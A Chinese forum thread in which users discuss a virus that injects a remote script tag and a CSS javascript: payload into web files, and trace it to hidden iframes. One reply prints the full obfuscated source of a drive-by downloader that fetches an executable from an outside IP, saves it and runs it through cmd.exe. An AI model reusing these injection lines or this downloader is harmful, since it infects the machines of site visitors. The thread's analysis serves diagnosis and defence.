病毒会把我机器上所有的网页格式的文件比如aspx,html，等最后加上
<script language=javascript src=http://www.1717av.com/1717.js></script>
所有的css文件，最后面加上
body{background-image: url('javascript:document.write("<script src=http://www.1717av.com/1717.js></script>")')}

我快疯了，谁来99我，有哪位高手，直接把www.1717av.com黑了算了

这是什么病毒？

对于菜鸟来说
最简单的办法就是清除病毒后
用HOSTS表屏蔽www.1717av.com这个网站

中了变种威金后出现此现象

用HOSTS表屏蔽www.1717av.com这个网站

请教这样怎么做，详细一点，谢谢

引用:

【飞天名猪的贴子】病毒会把我机器上所有的网页格式的文件比如aspx,html，等最后加上 <script language=javascript src=http://www.1717av.com/1717.js></script> 所有的css文件，最后面加上 body{background-image: url(''document.write("<script src=http://www.1717av.com/1717.js></script>")'')} 我快疯了，谁来99我，有哪位高手，直接把www.1717av.com黑了算了 这是什么病毒？ ………………

1717.js执行后，跳转到http://58.221.28.40/www/web.htm。
这个网页已经死掉了

版主真是太勇敢了
你把web.html查看一下源文件，会发现，其实还有东西
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip2.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip.htm" width="50" height="0" border="0"></iframe>

BAOHE斑竹 大意了
没看见下面有个站长统计吗
这是伪装的!!!!

vip1.htm打开是这个
<noscript>
<iframe src=*></iframe>
</noscript>
<script>
function gn(rRaGEykU1){var Orh2=window["\x4d\x61\x74\x68"]["\x72\x61\x6e\x64\x6f\x6d"]()*rRaGEykU1;return'\x7e\x74\x6d\x70'+'\x2e\x74\x6d\x70'}try{vip='http://58.221.28.40/www/vip.exe';var chenzi=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]("\x6f\x62\x6a\x65\x63\x74");chenzi["\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65"]("\x63\x6c\x61\x73\x73\x69\x64","\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");var ps=chenzi["\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74"]("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58"+"\x4d"+"\x4c"+"\x48"+"\x54"+"\x54"+"\x50","");var love=chenzi["\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74"]("\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d","");love["\x74\x79\x70\x65"]=1;ps["\x6f\x70\x65\x6e"]("\x47\x45\x54",vip,0);ps["\x73\x65\x6e\x64"]();china=gn(10000);var hHf$R6=chenzi["\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74"]("\x53\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x46\x69\x6c\x65\x53\x79\x73\x74\x65\x6d\x4f\x62\x6a\x65\x63\x74","");var VgDnZXHt7=hHf$R6["\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6c\x46\x6f\x6c\x64\x65\x72"](0);china=hHf$R6["\x42\x75\x69\x6c\x64\x50\x61\x74\x68"](VgDnZXHt7,china);love["\x4f\x70\x65\x6e"]();love["\x57\x72\x69\x74\x65"](ps["\x72\x65\x73\x70\x6f\x6e\x73\x65\x42\x6f\x64\x79"]);love["\x53\x61\x76\x65\x54\x6f\x46\x69\x6c\x65"](china,2);love["\x43\x6c\x6f\x73\x65"]();var SmAcqIwGV8=chenzi["\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74"]("\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e","");exp1=hHf$R6["\x42\x75\x69\x6c\x64\x50\x61\x74\x68"](VgDnZXHt7+'\\\x73\x79\x73\x74\x65\x6d\x33\x32','\x63\x6d\x64\x2e\x65\x78\x65');SmAcqIwGV8["\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65"](exp1,' \x2f\x63 '+china,"","\x6f\x70\x65\x6e",0)}catch(i){i=1}
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

向以身试毒的版主表示敬意....

引用:

【飞天名猪的贴子】版主真是太勇敢了 你把web.html查看一下源文件，会发现，其实还有东西 <iframe src="vip1.htm" width="0" height="0" border="0"></iframe> <iframe src="vip2.htm" width="0" height="0" border="0"></iframe> <iframe src="vip.htm" width="50" height="0" border="0"></iframe> ………………

这种DD，看也没什么意思。死的就是死的。